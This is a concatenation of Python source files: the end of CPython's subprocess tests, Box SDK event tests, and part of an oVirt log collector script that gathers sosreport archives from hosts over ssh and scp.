mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp", "fcntl"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
test_events.py
|
# coding: utf-8
from threading import Event, Thread
import pytest
import requests
from boxsdk.object.folder import FolderSyncState
from boxsdk.object.event import Event as BoxEvent
@pytest.fixture
def box_events(box_client):
return box_client.events()
@pytest.fixture
def move_target(box_client):
return box_client.folder('0').create_subfolder('move target')
@pytest.fixture
def copy_target(box_client):
return box_client.folder('0').create_subfolder('copy target')
@pytest.fixture
def assert_event(box_events):
# pylint:disable=redefined-outer-name
def helper(get_item, event_type, stream_position=0):
item = get_item()
events = box_events.get_events(stream_position=stream_position)['entries']
assert len(events) == 1
event = events[0]
assert event['event_type'] == event_type
assert event['source']['name'] == item.name
assert event['source']['id'] == item.id
assert isinstance(event, BoxEvent)
return helper
def test_get_long_poll_url(box_client):
options = box_client.events().get_long_poll_options()
with pytest.raises(requests.Timeout):
requests.get(options['url'], timeout=0.11)
def test_upload_causes_upload_event(uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file, 'ITEM_UPLOAD')
def test_create_folder_causes_create_event(created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder, 'ITEM_CREATE')
def test_move_file_causes_move_event(box_events, move_target, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file.move(move_target), 'ITEM_MOVE', box_events.get_latest_stream_position())
def test_move_folder_causes_move_event(box_events, move_target, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder.move(move_target), 'ITEM_MOVE', box_events.get_latest_stream_position())
def test_rename_file_causes_rename_event(box_events, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
updated_name = 'updated_{0}'.format(uploaded_file.name)
assert_event(lambda: uploaded_file.rename(updated_name), 'ITEM_RENAME', box_events.get_latest_stream_position())
def test_rename_folder_causes_rename_event(box_events, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
updated_name = 'updated_{0}'.format(created_subfolder.name)
assert_event(lambda: created_subfolder.rename(updated_name), 'ITEM_RENAME', box_events.get_latest_stream_position())
def test_copy_file_causes_copy_event(box_events, copy_target, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: uploaded_file.copy(copy_target), 'ITEM_COPY', box_events.get_latest_stream_position())
def test_copy_folder_causes_copy_event(box_events, copy_target, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(lambda: created_subfolder.copy(copy_target), 'ITEM_COPY', box_events.get_latest_stream_position())
@pytest.mark.xfail(reason='trash event has no source')
def test_delete_file_causes_trash_event(box_events, uploaded_file, assert_event):
# pylint:disable=redefined-outer-name
assert_event(uploaded_file.delete, 'ITEM_TRASH', box_events.get_latest_stream_position())
@pytest.mark.xfail(reason='trash event has no source')
def test_delete_folder_causes_trash_event(box_events, created_subfolder, assert_event):
# pylint:disable=redefined-outer-name
assert_event(created_subfolder.delete, 'ITEM_TRASH', box_events.get_latest_stream_position())
@pytest.mark.parametrize('sync_state,event_type', [
(FolderSyncState.IS_SYNCED, 'ITEM_SYNC'),
(FolderSyncState.NOT_SYNCED, 'ITEM_UNSYNC'),
])
def test_sync_folder_causes_sync_event(box_events, created_subfolder, assert_event, sync_state, event_type):
# pylint:disable=redefined-outer-name
assert_event(
lambda: created_subfolder.update_sync_state(sync_state.value),
event_type,
box_events.get_latest_stream_position(),
)
@pytest.fixture
def long_poll_generator(box_events, uploaded_file, request):
# pylint:disable=redefined-outer-name
generator = box_events.generate_events_with_long_polling(stream_position=0)
def long_poll():
for event in generator:
long_poll_thread.events.append(event)
long_poll_thread.event_ready.set()
if long_poll_thread.should_stop_polling:
return
long_poll_thread.consumed_events.wait()
long_poll_thread.consumed_events.clear()
long_poll_thread = Thread(target=long_poll)
long_poll_thread.should_stop_polling = False
long_poll_thread.events = []
long_poll_thread.event_ready = Event()
long_poll_thread.consumed_events = Event()
long_poll_thread.start()
def fin():
long_poll_thread.should_stop_polling = True
uploaded_file.delete()
long_poll_thread.event_ready.wait()
generator.close()
long_poll_thread.join()
request.addfinalizer(fin)
return long_poll_thread
def test_generate_events_with_long_polling(long_poll_generator, created_subfolder, uploaded_file):
# pylint:disable=redefined-outer-name
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
assert not long_poll_generator.event_ready.wait(timeout=0.01)
assert len(long_poll_generator.events) == 2
folder_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'folder')
file_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'file')
assert folder_event['event_type'] == 'ITEM_CREATE'
assert file_event['event_type'] == 'ITEM_UPLOAD'
assert folder_event['source']['id'] == created_subfolder.id
assert file_event['source']['id'] == uploaded_file.id
assert folder_event['source']['name'] == created_subfolder.name
assert file_event['source']['name'] == uploaded_file.name
del long_poll_generator.events[:]
uploaded_file.rename('updated_{0}'.format(uploaded_file.name))
created_subfolder.rename('updated_{0}'.format(created_subfolder.name))
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
long_poll_generator.event_ready.wait()
long_poll_generator.event_ready.clear()
long_poll_generator.consumed_events.set()
assert not long_poll_generator.event_ready.wait(timeout=0.01)
assert len(long_poll_generator.events) == 2
folder_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'folder')
file_event = next(e for e in long_poll_generator.events if e['source']['type'] == 'file')
assert folder_event['event_type'] == 'ITEM_RENAME'
assert file_event['event_type'] == 'ITEM_RENAME'
assert folder_event['source']['id'] == created_subfolder.id
assert file_event['source']['id'] == uploaded_file.id
assert folder_event['source']['name'] == 'updated_{0}'.format(created_subfolder.name)
assert file_event['source']['name'] == 'updated_{0}'.format(uploaded_file.name)
|
logcollector.py
|
#!/usr/bin/python
import sys
import os
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
import subprocess
import shlex
import urllib
import urllib2
import base64
import pprint
import fnmatch
import traceback
import tempfile
import shutil
import logging
import getpass
from schemas import hypervisors
versionNum="1.0.0"
STREAM_LOG_FORMAT = '%(levelname)s: %(message)s'
FILE_LOG_FORMAT = '%(asctime)s::%(levelname)s::%(module)s::%(lineno)d::%(name)s:: %(message)s'
FILE_LOG_DSTMP = '%Y-%m-%d %H:%M:%S'
DEFAULT_SSH_KEY = "/etc/pki/ovirt-engine/keys/engine_id_rsa"
DEFAULT_SSH_USER = 'root'
DEFAULT_CONFIGURATION_FILE = "/etc/ovirt-engine/logcollector.conf"
DEFAULT_SCRATCH_DIR='/tmp/logcollector'
DEFAULT_LOG_FILE='/var/log/ovirt-engine/engine-log-collector.log'
DEFAULT_TIME_SHIFT_FILE='time_diff.txt'
def multilog(logger, msg):
for line in str(msg).splitlines():
logger(line)
def get_from_prompt(msg, default=None, prompter=raw_input):
try:
value = prompter(msg)
if value.strip():
return value.strip()
else:
return default
except EOFError:
print
return default
class ExitCodes():
"""
A simple psudo-enumeration class to hold the current and future exit codes
"""
NOERR=0
CRITICAL=1
WARN=2
exit_code=NOERR
class Caller(object):
"""
Utility class for forking programs.
"""
def __init__(self, configuration):
self.configuration = configuration
def prep(self, cmd):
_cmd = cmd % self.configuration
return shlex.split(_cmd)
def call(self, cmds):
"""Uses the configuration to fork a subprocess and run cmds."""
_cmds = self.prep(cmds)
proc = subprocess.Popen(_cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
returncode = proc.returncode
logging.debug("returncode(%s)" % returncode)
logging.debug("STDOUT(%s)" % stdout)
logging.debug("STDERR(%s)" % stderr)
if returncode == 0:
return stdout
else:
raise Exception(stderr)
class Configuration(dict):
"""This class is a dictionary subclass that knows how to read and """
"""handle our configuration. Resolution order is defaults -> """
"""configuration file -> command line options."""
class SkipException(Exception):
"This exception is raised when the user aborts a prompt"
pass
def __init__(self,
parser=None):
self.command = "list"
self.parser = parser
self.options = None
self.args = None
# Immediately, initialize the logger to the INFO log level and our
# logging format which is <LEVEL>: <MSG> and not the default of
# <LEVEL>:<UID: <MSG>
self.__initLogger(logging.INFO)
if not parser:
raise Exception("Configuration requires a parser")
self.options, self.args = self.parser.parse_args()
if os.geteuid() != 0:
raise Exception("This tool requires root permissions to run.")
# At this point we know enough about the command line options
# to test for verbose and if it is set we should re-initialize
# the logger to DEBUG. This will have the effect of printing
# stack traces if there are any exceptions in this class.
if getattr(self.options, "verbose"):
self.__initLogger(logging.DEBUG)
self.load_config_file()
if self.options:
# Need to parse again to override conf file options
self.options, self.args = self.parser.parse_args(values=self.options)
self.from_options(self.options, self.parser)
# Need to parse out options from the option groups.
self.from_option_groups(self.options, self.parser)
if self.args:
self.from_args(self.args)
# Finally, all options from the command line and possibly a configuration
# file have been processed. We need to re-initialize the logger if
# the user has supplied either --quiet processing or supplied a --log-file.
# This will ensure that any further log messages throughout the lifecycle
# of this program go to the log handlers that the user has specified.
if self.options.log_file or self.options.quiet:
level = logging.INFO
if self.options.verbose:
level = logging.DEBUG
self.__initLogger(level, self.options.quiet, self.options.log_file)
def __missing__(self, key):
return None
def load_config_file(self):
"""Loads the user-supplied config file or the system default.
If the user supplies a bad filename we will stop."""
if self.options and getattr(self.options, "conf_file"):
if os.path.isfile(self.options.conf_file):
self.from_file(self.options.conf_file)
else:
raise Exception("The specified configuration file does not exist. File=(%s)" %
self.options.conf_file)
elif os.path.isfile(DEFAULT_CONFIGURATION_FILE):
self.from_file(DEFAULT_CONFIGURATION_FILE)
def from_option_groups(self,options,parser):
for optGrp in parser.option_groups:
for optGrpOpts in optGrp.option_list:
opt_value = getattr(options, optGrpOpts.dest)
if opt_value is not None:
self[optGrpOpts.dest] = opt_value
def from_options(self, options, parser):
for option in parser.option_list:
if option.dest:
opt_value = getattr(options, option.dest)
if opt_value is not None:
self[option.dest] = opt_value
def from_file(self, filename):
import ConfigParser
cp = ConfigParser.ConfigParser()
cp.read(filename)
# we want the items from the LogCollector section only
try:
opts = ["--%s=%s" % (k,v)
for k,v in cp.items("LogCollector")]
(new_options, args) = self.parser.parse_args(args=opts, values=self.options)
self.from_option_groups(new_options, self.parser)
self.from_options(new_options, self.parser)
except ConfigParser.NoSectionError:
pass
def from_args(self, args):
self.command = args[0]
if self.command not in ('list', 'collect'):
raise Exception("%s is not a valid command." % self.command)
def prompt(self, key, msg):
if key not in self:
self._prompt(raw_input, key, msg)
def getpass(self, key, msg):
if key not in self:
self._prompt(getpass.getpass, key, msg)
# This doesn't ask for CTRL+C to abort because KeyboardInterrupts don't
# seem to behave the same way every time. Take a look at the link:
# http://stackoverflow.com/questions/4606942/why-cant-i-handle-a-keyboardinterrupt-in-python
def _prompt(self, prompt_function, key, msg=None):
value = get_from_prompt(msg="Please provide the %s (CTRL+D to skip): " % msg,
prompter=prompt_function)
if value:
self[key] = value
else:
raise self.SkipException
def ensure(self, key, default=""):
if key not in self:
self[key] = default
def has_all(self, *keys):
return all(self.get(key) for key in keys)
def has_any(self, *keys):
return any(self.get(key) for key in keys)
def __ensure_path_to_file(self, file_):
dir_ = os.path.dirname(file_)
if not os.path.exists(dir_):
logging.info("%s does not exists. It will be created." % dir_)
os.makedirs(dir_, 0755)
def __log_to_file(self, file_, level):
try:
self.__ensure_path_to_file(file_)
hdlr = logging.FileHandler(filename=file_, mode='w')
fmt = logging.Formatter(FILE_LOG_FORMAT, FILE_LOG_DSTMP)
hdlr.setFormatter(fmt)
logging.root.addHandler(hdlr)
logging.root.setLevel(level)
except Exception, e:
logging.error("Could not configure file logging: %s" % e)
def __log_to_stream(self, level):
sh = logging.StreamHandler()
fmt = logging.Formatter(STREAM_LOG_FORMAT)
sh.setLevel(level)
sh.setFormatter(fmt)
logging.root.addHandler(sh)
def __initLogger(self, logLevel=logging.INFO, quiet=None, logFile=None):
"""
Initialize the logger based on information supplied from the
command line or configuration file.
"""
# If you call basicConfig more than once without removing handlers
# it is effectively a noop. In this program it is possible to call
# __initLogger more than once as we learn information about what
# options the user has supplied in either the config file or
# command line; hence, we will need to load and unload the handlers
# to ensure consistently fomatted output.
log = logging.getLogger()
for h in log.handlers:
log.removeHandler(h)
if quiet:
if logFile:
# Case: Batch and log file supplied. Log to only file
self.__log_to_file(logFile, logLevel)
else:
# If the user elected quiet mode *and* did not supply
# a file. We will be *mostly* quiet but not completely.
# If there is an exception/error/critical we will print
# to stdout/stderr.
logging.basicConfig(level=logging.ERROR, format=STREAM_LOG_FORMAT)
else:
if logFile:
# Case: Not quiet and log file supplied. Log to both file and
# stdout/stderr
self.__log_to_file(logFile, logLevel)
self.__log_to_stream(logLevel)
else:
# Case: Not quiet and no log file supplied. Log to only stdout/stderr
logging.basicConfig(level=logLevel, format=STREAM_LOG_FORMAT)
class CollectorBase(object):
def __init__(self,
hostname,
configuration=None,
**kwargs):
self.hostname = hostname
if configuration:
self.configuration = configuration.copy()
else:
self.configuration = {}
self.prep()
self.caller = Caller(self.configuration)
def prep(self):
self.configuration['ssh_cmd'] = self.format_ssh_command()
self.configuration['scp_cmd'] = self.format_ssh_command(cmd="scp")
def get_key_file(self):
return self.configuration.get("key_file")
def get_ssh_user(self):
return "%s@" % DEFAULT_SSH_USER
def parse_sosreport_stdout(self, stdout):
def reportFinder(line):
if fnmatch.fnmatch(line, '*sosreport-*tar*'):
return line
else:
return None
def md5Finder(line):
if fnmatch.fnmatch(line, 'The md5sum is*'):
return line
else:
return None
try:
lines = stdout.splitlines()
fileAry = filter(reportFinder,lines)
if fileAry is not None:
if fileAry[0] is not None and len(fileAry) > 0:
path = fileAry[0].strip()
filename = os.path.basename(path)
self.configuration["filename"] = filename
if os.path.isabs(path):
self.configuration["path"] = path
else:
self.configuration["path"] = os.path.join(self.configuration["local_tmp_dir"], filename)
else:
self.configuration["filename"] = None
self.configuration["path"] = None
else:
self.configuration["filename"] = None
self.configuration["path"] = None
fileAry = filter(md5Finder,lines)
if fileAry is not None and len(fileAry) > 0:
if fileAry[0] is not None:
md5sum = fileAry[0].partition(": ")[-1]
self.configuration["checksum"] = md5sum
else:
self.configuration["checksum"] = None
else:
self.configuration["checksum"] = None
logging.debug("filename(%s)" % self.configuration["filename"])
logging.debug("path(%s)" % self.configuration["path"])
logging.debug("checksum(%s)" % self.configuration["checksum"])
except IndexError, e:
logging.debug("message(%s)" % e)
logging.debug("parse_sosreport_stdout: " + traceback.format_exc())
raise Exception("Could not parse sosreport output to determine filename")
def format_ssh_command(self, cmd="ssh"):
cmd = "/usr/bin/%s " % cmd
if "ssh_port" in self.configuration:
port_flag = "-p" if cmd.startswith("/usr/bin/ssh") else "-P"
cmd += port_flag + " %(ssh_port)s " % self.configuration
if self.get_key_file():
cmd += "-i %s " % self.get_key_file()
# ignore host key checking
cmd += "-oStrictHostKeyChecking=no "
cmd += self.get_ssh_user()
return cmd + "%s" % self.hostname
class HyperVisorData(CollectorBase):
def __init__(self,
hostname,
configuration=None,
semaphore=None,
queue=None,
**kwargs):
super(HyperVisorData, self).__init__(hostname,configuration)
self.semaphore = semaphore
self.queue = queue
def prep(self):
self.configuration["hostname"] = self.hostname
self.configuration['ssh_cmd'] = self.format_ssh_command()
self.configuration['scp_cmd'] = self.format_ssh_command(cmd="scp")
self.configuration['reports'] = ",".join((
"libvirt",
"vdsm",
"general",
"networking",
"hardware",
"process",
"yum",
"filesys",
"devicemapper",
"selinux",
"kernel",
))
# these are the reports that will work with rhev2.2 hosts
self.configuration['bc_reports'] = "vdsm,general,networking,hardware,process,yum,filesys"
def get_time_diff(self, stdout):
import datetime
h_time = datetime.datetime.strptime(
stdout.strip(), "%a, %d %b %Y %H:%M:%S +0000")
l_time = datetime.datetime.utcnow()
logging.debug("host <%s> time: %s" % (self.configuration["hostname"], h_time.isoformat()))
logging.debug("local <%s> time: %s" % ("localhost", l_time.isoformat(),))
time_diff = "%(hostname)s " % self.configuration
if h_time > l_time:
self.queue.append(time_diff + "+%s" % (h_time - l_time))
else:
self.queue.append(time_diff + "-%s" % (l_time - h_time))
def sosreport(self):
cmd = """%(ssh_cmd)s "
VERSION=`/bin/rpm -q --qf '[%%{VERSION}]' sos | /bin/sed 's/\.//'`;
if [ "$VERSION" -ge "22" ]; then
/usr/sbin/sosreport --batch -o %(reports)s
elif [ "$VERSION" -ge "17" ]; then
/usr/sbin/sosreport --no-progressbar -o %(bc_reports)s
else
/bin/echo "No valid version of sosreport found." 1>&2
exit 1
fi
"
"""
return self.caller.call(cmd)
def run(self):
try:
logging.info("collecting information from %(hostname)s" % self.configuration)
stdout = self.sosreport()
self.parse_sosreport_stdout(stdout)
self.configuration["hypervisor_dir"] = os.path.join(self.configuration.get("local_scratch_dir"),self.configuration.get("hostname"))
os.mkdir(self.configuration["hypervisor_dir"])
self.configuration['archive_name'] = self.configuration.get("hostname") + "-" + os.path.basename(self.configuration.get("path"))
self.caller.call('%(scp_cmd)s:%(path)s %(hypervisor_dir)s/%(archive_name)s')
self.caller.call('%(ssh_cmd)s "/bin/rm %(path)s*"')
# setting up a pipeline since passing stdin to communicate doesn't seem to work
echo_cmd = self.caller.prep('/bin/echo "%(checksum)s %(hypervisor_dir)s/%(archive_name)s"')
md5sum_cmd = self.caller.prep("/usr/bin/md5sum -c -")
result = None
p1 = subprocess.Popen(echo_cmd, stdout=subprocess.PIPE)
p2 = subprocess.Popen(md5sum_cmd, stdin=p1.stdout, stdout=subprocess.PIPE)
result = p2.communicate()[0]
stdout = self.caller.call('%(ssh_cmd)s "/bin/date -uR"')
try:
self.get_time_diff(stdout)
except ValueError, e:
logging.debug("get_time_diff: " + str(e))
if result and "OK" not in result:
logging.error("checksum test: " + result)
raise Exception("%(local_scratch_dir)s/%(filename)s failed checksum test!" % self.configuration)
except Exception, e:
ExitCodes.exit_code=ExitCodes.WARN
logging.error("Failed to collect logs from: %s; %s" % (self.configuration.get("hostname"), e))
multilog(logging.debug,traceback.format_exc())
logging.debug("Configuration for %(hostname)s:" % self.configuration)
multilog(logging.debug,pprint.pformat(self.configuration))
finally:
if self.semaphore:
self.semaphore.release()
logging.info("finished collecting information from %(hostname)s" % self.configuration)
class ENGINEData(CollectorBase):
def build_options(self):
opts = ["-k rpm.rpmva=off",
"-k engine.vdsmlogs=%s" % self.configuration.get("local_scratch_dir"),
"-k engine.prefix=on"]
for key, value in self.configuration.iteritems():
if key.startswith("java") or key.startswith("jboss"):
opts.append('-k %s="%s"' % (key,value))
if self.configuration.get("ticket_number"):
opts.append("--ticket-number=%s" % self.configuration.get("ticket_number"))
if self.configuration.get("upload"):
opts.append("--upload=%s" % self.configuration.get("upload"))
return " ".join(opts)
def sosreport(self):
self.configuration["reports"] = ",".join((
"jboss",
"engine",
"rpm",
"libvirt",
"general",
"networking",
"hardware",
"process",
"yum",
"filesys",
"devicemapper",
"selinux",
"kernel",
))
self.configuration["sos_options"] = self.build_options()
stdout = self.caller.call('/usr/sbin/sosreport --batch --report --tmp-dir=%(local_tmp_dir)s -o %(reports)s %(sos_options)s')
self.parse_sosreport_stdout(stdout)
if os.path.exists(self.configuration["path"]):
archiveSize = '%.1fM' % (float(os.path.getsize(self.configuration["path"])) / (1 << 20))
else:
archiveSize = None
return """Log files have been collected and placed in %s.
The MD5 for this file is %s and its size is %s""" % (
self.configuration["path"] ,
self.configuration["checksum"],
archiveSize)
class PostgresData(CollectorBase):
def get_key_file(self):
"""
Override the base get_key_file method to return the SSH key for the
PostgreSQL system if there is one. Returns None if there isn't one.
"""
return self.configuration.get("pg_host_key")
def get_ssh_user(self):
"""
Override the base get_ssh_user method to return the SSH user for the
PostgreSQL system if there is one.
"""
if self.configuration.get("pg_ssh_user"):
return "%s@" % self.configuration.get("pg_ssh_user")
else:
return "%s@" % DEFAULT_SSH_USER
def sosreport(self):
if self.configuration.get("pg_pass"):
opt = '-k postgresql.dbname=%(pg_dbname)s -k postgresql.username=%(pg_user)s -k postgresql.password=%(pg_pass)s'
else:
opt = ""
if self.hostname == "localhost":
stdout = self.caller.call('/usr/sbin/sosreport --batch --report -o postgresql '
'--tmp-dir=%(local_scratch_dir)s ' + opt)
self.parse_sosreport_stdout(stdout)
# Prepend postgresql- to the .md5 file that is produced by SOS
# so that it is easy to distinguish from the other N reports
# that are all related to hypervisors. Note, that we
# only do this in the case of a local PostgreSQL DB because
# when the DB is remote the .md5 file is not copied.
os.rename("%s.md5" % (self.configuration["path"]),
os.path.join(self.configuration["local_scratch_dir"],
"postgresql-%s.md5" % self.configuration["filename"]))
else:
# The PG database is on a remote host
cmd = '%(ssh_cmd)s "/usr/sbin/sosreport --batch --report -o postgresql ' + opt
stdout = self.caller.call(cmd)
self.parse_sosreport_stdout(stdout)
self.caller.call('%(scp_cmd)s:%(path)s %(local_scratch_dir)s')
self.caller.call('%(ssh_cmd)s "rm %(path)s*"')
# Prepend postgresql- to the PostgreSQL SOS report
# so that it is easy to distinguished from the other N reports
# that are all related to hypervisors.
os.rename(os.path.join(self.configuration["local_scratch_dir"], self.configuration["filename"]),
os.path.join(self.configuration["local_scratch_dir"], "postgresql-%s" % self.configuration["filename"]))
class LogCollector(object):
def __init__(self, configuration):
self.conf = configuration
if self.conf.command is None:
raise Exception("No command specified.")
def write_time_diff(self, queue):
local_scratch_dir = self.conf.get("local_scratch_dir")
with open(os.path.join(local_scratch_dir, DEFAULT_TIME_SHIFT_FILE), "w") as fd:
for record in queue:
fd.write(record + "\n")
def _get_hypervisors_from_api(self):
if not self.conf:
raise Exception("No configuration.")
try:
self.conf.prompt("engine", msg="hostname of oVirt Engine")
self.conf.prompt("user", msg="REST API username for oVirt Engine")
self.conf.getpass("passwd", msg="REST API password for the %s oVirt Engine user" % self.conf.get("user"))
except Configuration.SkipException:
logging.info("Will not collect hypervisor list from oVirt Engine API.")
raise
try:
return hypervisors.get_all(self.conf.get("engine"),
self.conf.get("user"),
self.conf.get("passwd"))
except Exception, e:
ExitCodes.exit_code=ExitCodes.WARN
logging.error("_get_hypervisors_from_api: %s" % e)
return set()
@staticmethod
def _sift_patterns(list_):
"""Returns two sets: patterns and others. A pattern is any string
that contains the any of the following: * [ ] ?"""
patterns = set()
others = set()
try:
for candidate in list_:
if any(c in candidate for c in ('*', '[', ']', '?')):
patterns.add(candidate)
else:
others.add(candidate)
except TypeError:
pass
return patterns, others
def _filter_hosts(self, which, pattern):
logging.debug("filtering host list with %s against %s name" % (pattern, which))
if which == "host":
return set([(dc, cl, h) for dc, cl, h in self.conf.get("hosts")
if fnmatch.fnmatch(h, pattern)])
elif which == "cluster":
return set([(dc, cl, h) for dc, cl, h in self.conf.get("hosts")
if fnmatch.fnmatch(cl, pattern)])
elif which == "datacenter":
return set([(dc, cl, h) for dc, cl, h in self.conf.get("hosts")
if fnmatch.fnmatch(dc, pattern)])
def set_hosts(self):
"""Fetches the hostnames for the supplied cluster or datacenter.
Filtering is applied if patterns are found in the --hosts, --cluster
or --datacenters options. There can be multiple patterns in each
option. Patterns found within the same option are inclusive and
each each option set together is treated as an intersection.
"""
self.conf["hosts"] = set()
host_patterns, host_others = self._sift_patterns(self.conf.get("hosts_list"))
datacenter_patterns = self.conf.get("datacenter", [])
cluster_patterns = self.conf.get("cluster", [])
if host_patterns:
self.conf['host_pattern'] = host_patterns
if any((host_patterns,
datacenter_patterns,
cluster_patterns)) or not host_others:
self.conf["hosts"] = self._get_hypervisors_from_api()
host_filtered = set()
cluster_filtered = set()
datacenter_filtered = set()
if host_patterns:
for pattern in host_patterns:
host_filtered |= self._filter_hosts("host", pattern)
self.conf['hosts'] &= host_filtered
if datacenter_patterns:
for pattern in datacenter_patterns:
datacenter_filtered |= self._filter_hosts("datacenter", pattern)
self.conf['hosts'] &= datacenter_filtered
if cluster_patterns:
for pattern in cluster_patterns:
cluster_filtered |= self._filter_hosts("cluster", pattern)
self.conf['hosts'] &= cluster_filtered
# build a set of hostnames that are already in the target host list.
# So that we can prevent duplication in the next step
hostnames = set((t[2] for t in self.conf['hosts']))
for hostname in host_others:
if hostname not in hostnames:
self.conf['hosts'].add(("", "", hostname))
return bool(self.conf.get("hosts"))
def list_hosts(self):
def get_host(tuple_):
return tuple_[2]
host_list = list(self.conf.get("hosts"))
